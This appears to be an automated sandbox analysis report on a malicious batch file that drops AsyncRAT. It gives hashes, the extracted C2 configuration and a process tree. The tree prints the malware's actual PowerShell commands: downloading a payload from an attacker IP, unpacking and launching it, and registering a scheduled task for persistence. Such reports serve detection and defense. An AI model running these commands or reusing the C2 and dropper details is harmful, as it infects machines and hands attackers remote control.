Analysis

  • max time kernel
    135s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-11-2024 08:01

General

  • Target

    Sat.bat

  • Size

    2KB

  • MD5

    0e2fff554ddadc58aaff7978ec06aa32

  • SHA1

    b453b17905235ea96150c90711285f7879d3afc0

  • SHA256

    64c79060f8478363e93ae210e0bd7ba9178fecdd1a0badba4fed5382180d3a80

  • SHA512

    c54cc4c956dc733835d0d40d49377b23b8b63bfa118e0e9ed5bba18e2b2b5f4a33656cd5b75230cd7dec05a98a3bc4b84b429121cffe3644fff72fc628b83b76

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://109.199.101.109:770/xx.jpg

Extracted

Family

asyncrat

Version

AWS | 3Losh

Botnet

Default

C2

samsalah1.freeddns.org:1005

Mutex

AsyncMutex_alosh

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Suspicious use of SetThreadContext 33 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 33 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 56 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Sat.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3428
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\Sat.bat' -ArgumentList 'minimized' -WindowStyle Minimized"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:876
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Sat.bat" minimized "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4840
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "(New-Object System.Net.WebClient).DownloadFile('http://109.199.101.109:770/xx.jpg', 'C:\Users\Admin\Documents\x.zip')"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1184
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command "Expand-Archive -Path 'C:\Users\Admin\Documents\x.zip' -DestinationPath 'C:\Users\Admin\Documents'"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4120
        • C:\Windows\system32\timeout.exe
          timeout /t 5 /nobreak
          4⤵
          • Delays execution with timeout.exe
          PID:1924
        • C:\Users\Admin\Documents\AutoHotkey64.exe
          "C:\Users\Admin\Documents\AutoHotkey64.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:2532
        • C:\Users\Admin\Documents\AutoHotkey64.exe
          "C:\Users\Admin\Documents\AutoHotkey64.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          PID:4356
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1816
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:1196
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4048
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:1788
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            5⤵
              PID:4252
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
              5⤵
                PID:4736
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:744
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                5⤵
                • System Location Discovery: System Language Discovery
                PID:1676
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                5⤵
                  PID:1408
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:4420
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  5⤵
                    PID:3104
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:4240
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:3232
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:4984
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                    5⤵
                      PID:4400
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                      5⤵
                        PID:2444
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:2292
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                        5⤵
                        • System Location Discovery: System Language Discovery
                        PID:1464
                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                        5⤵
                          PID:1344
                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                          5⤵
                            PID:2064
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                            5⤵
                            • System Location Discovery: System Language Discovery
                            PID:2188
                        • C:\Users\Admin\Documents\AutoHotkey64.exe
                          "C:\Users\Admin\Documents\AutoHotkey64.exe"
                          4⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SendNotifyMessage
                          • Suspicious use of WriteProcessMemory
                          PID:3472
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            5⤵
                            • System Location Discovery: System Language Discovery
                            PID:1752
                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            5⤵
                              PID:1132
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:5028
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:1820
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:1364
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:1432
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                              5⤵
                              • System Location Discovery: System Language Discovery
                              PID:2552
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                              5⤵
                                PID:4504
                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                5⤵
                                  PID:2036
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                  5⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2236
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                  5⤵
                                    PID:4640
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4276
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2428
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                    5⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1888
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                                    5⤵
                                      PID:1952
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                                      5⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:5072
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                                      5⤵
                                        PID:4428
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:1168
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"
                                        5⤵
                                          PID:2320
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                          5⤵
                                            PID:3724
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                            5⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:3028
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                            5⤵
                                              PID:2772
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                              5⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:1760
                                          • C:\Windows\system32\schtasks.exe
                                            schtasks /Query /TN "alosh"
                                            4⤵
                                              PID:3900
                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              powershell.exe -Command "$tr = New-Object -ComObject Schedule.Service; " "$tr.Connect(); " "$ta = $tr.NewTask(0); " "$ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; " "$ta.Settings.Enabled = $true; " "$ta.Settings.DisallowStartIfOnBatteries = $false; " "$st = $ta.Triggers.Create(1); " "$st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); " "$st.Repetition.Interval = 'PT2M'; " "$md = $ta.Actions.Create(0); " "$md.Path = 'C:\Users\Admin\\Documents\\AutoHotkey64.exe'; " "$ns = $tr.GetFolder('\'); " "$ns.RegisterTaskDefinition('alosh', $ta, 6, $null, $null, 3);"
                                              4⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4704
                                      • C:\Users\Admin\Documents\AutoHotkey64.exe
                                        C:\Users\Admin\\Documents\\AutoHotkey64.exe
                                        1⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of FindShellTrayWindow
                                        • Suspicious use of SendNotifyMessage
                                        PID:2896
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                          2⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:3520
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                          2⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:3644
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                          2⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:5048
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                          2⤵
                                            PID:4984
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                            2⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:1620
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                            2⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:364
                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                            2⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:5064

                                        Network

                                        MITRE ATT&CK Enterprise v15

                                        Replay Monitor

                                        Loading Replay Monitor...

                                        Downloads

                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                          Filesize

                                          2KB

                                          MD5

                                          6cf293cb4d80be23433eecf74ddb5503

                                          SHA1

                                          24fe4752df102c2ef492954d6b046cb5512ad408

                                          SHA256

                                          b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                          SHA512

                                          0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegAsm.exe.log

                                          Filesize

                                          425B

                                          MD5

                                          4eaca4566b22b01cd3bc115b9b0b2196

                                          SHA1

                                          e743e0792c19f71740416e7b3c061d9f1336bf94

                                          SHA256

                                          34ba0ab8d1850e7825763f413142a333ccbc05fa2b5499a28a7d27b8a1c5b4bb

                                          SHA512

                                          bc2b1bf45203e3bb3009a7d37617b8f0f7ffa613680b32de2b963e39d2cf1650614d7035a0cf78f35a4f5cb17a2a439e2e07deaefd2a4275a62efd0a5c0184a1

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          64B

                                          MD5

                                          50a8221b93fbd2628ac460dd408a9fc1

                                          SHA1

                                          7e99fe16a9b14079b6f0316c37cc473e1f83a7e6

                                          SHA256

                                          46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e

                                          SHA512

                                          27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          1KB

                                          MD5

                                          1dffbab5ecc6d06e8b259ad505a0dc2a

                                          SHA1

                                          0938ec61e4af55d7ee9d12708fdc55c72ccb090c

                                          SHA256

                                          a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e

                                          SHA512

                                          93209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76

                                        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Filesize

                                          1KB

                                          MD5

                                          75c68c9432489583cfc90ee7d4a8e9d7

                                          SHA1

                                          2b7d3ea37c7f255959ef060ae65c843a45a7b062

                                          SHA256

                                          463f44994f51baee463d1d3180b40806ee8ec1c3a9acd9bd4f72f535f42fe566

                                          SHA512

                                          7872768c71bde00d650a99c717fd90a576c0ab04398c9d44d0a66fd71ce9e335235cf54dbb54db029cadb3adf90b558df5b69794378204146b037dfaf6192f80

                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t2o0lesj.dwa.ps1

                                          Filesize

                                          60B

                                          MD5

                                          d17fe0a3f47be24a6453e9ef58c94641

                                          SHA1

                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                          SHA256

                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                          SHA512

                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                        • C:\Users\Admin\Documents\A.txt

                                          Filesize

                                          270KB

                                          MD5

                                          fcb797ad5f0600fabe1f0f32ea35063a

                                          SHA1

                                          c869826b399026e6a394f260f697f7daae4b30f6

                                          SHA256

                                          dd354350e31dd582e3060e1d9e7fc89d5eee5d6af36178095ade798b5f7715ad

                                          SHA512

                                          e5750c59aead966926ace3a71b66fa1710930c9e2ac0a08766be63302f8d09ffaf0a4549de016d1297ba52066409814518a83d68e818f26fb94fb0c5551c4623

                                        • C:\Users\Admin\Documents\AutoHotkey64.ahk

                                          Filesize

                                          6KB

                                          MD5

                                          65bd377a23adf5d7d3f8d902d3fcead2

                                          SHA1

                                          570381a1edc203245fa6ff087efaed510a52e16d

                                          SHA256

                                          6bd2a145c7017b2ee3434f4893f497999d2bd11818a56794a4b6df04c0cc6120

                                          SHA512

                                          63de2c32dc2ac8098796fba837c3ccd93ad91af293e3add8cde56e5a2d70426d83a2b88ffcc3d2c02d3a895c2f1e3502bae405db0047f0267549075a0187c236

                                        • C:\Users\Admin\Documents\AutoHotkey64.exe

                                          Filesize

                                          1.2MB

                                          MD5

                                          e92a3d6ca4bde49c6f0e1e343fdae44e

                                          SHA1

                                          02c27d2e076a19f54b133bb9c57b457b242d4116

                                          SHA256

                                          16109cec66cf252e5b851739bc9f7639a1802a0c3998b3829950e52911ca6599

                                          SHA512

                                          19df941ca771a23756936c0ee08fd5a9218784f2712c5735245aeacb532e46215654e4ddf83fbdd4b4d6a1aac3fb2a95119d883f4b3229cc7a4c690b197e24e7

                                        • C:\Users\Admin\Documents\x.zip

                                          Filesize

                                          648KB

                                          MD5

                                          134af0f2fc2a9cd8976a242b81f8840f

                                          SHA1

                                          8a7acfbe935abd112af0b4eb77dc87ba595f64a5

                                          SHA256

                                          0268871620a416498e385020574721680eae7a9d887eb995fc6d3fef61d568d8

                                          SHA512

                                          b711acabe2dd8223accb1571f2c68d099f0977d350df4cf74b969e9b4a6fe1a563ff91cf8f81105ab3e6a94d973f6bded067e22b81192dc04ceff4212057169c

                                        • memory/876-0-0x00007FFE58A43000-0x00007FFE58A45000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/876-1-0x000002A8F3B60000-0x000002A8F3B82000-memory.dmp

                                          Filesize

                                          136KB

                                        • memory/876-12-0x00007FFE58A40000-0x00007FFE59501000-memory.dmp

                                          Filesize

                                          10.8MB

                                        • memory/876-11-0x00007FFE58A40000-0x00007FFE59501000-memory.dmp

                                          Filesize

                                          10.8MB

                                        • memory/876-15-0x00007FFE58A40000-0x00007FFE59501000-memory.dmp

                                          Filesize

                                          10.8MB

                                        • memory/1184-29-0x00007FFE58A40000-0x00007FFE59501000-memory.dmp

                                          Filesize

                                          10.8MB

                                        • memory/1184-32-0x00007FFE58A40000-0x00007FFE59501000-memory.dmp

                                          Filesize

                                          10.8MB

                                        • memory/1184-27-0x00007FFE58A40000-0x00007FFE59501000-memory.dmp

                                          Filesize

                                          10.8MB

                                        • memory/1184-17-0x00007FFE58A40000-0x00007FFE59501000-memory.dmp

                                          Filesize

                                          10.8MB

                                        • memory/1196-85-0x0000000005730000-0x00000000057CC000-memory.dmp

                                          Filesize

                                          624KB

                                        • memory/1196-87-0x0000000005840000-0x00000000058A6000-memory.dmp

                                          Filesize

                                          408KB

                                        • memory/1196-86-0x0000000005D80000-0x0000000006324000-memory.dmp

                                          Filesize

                                          5.6MB

                                        • memory/1752-72-0x0000000000400000-0x0000000000416000-memory.dmp

                                          Filesize

                                          88KB

                                        • memory/4120-43-0x000001F8710A0000-0x000001F8710B2000-memory.dmp

                                          Filesize

                                          72KB

                                        • memory/4120-44-0x000001F871090000-0x000001F87109A000-memory.dmp

                                          Filesize

                                          40KB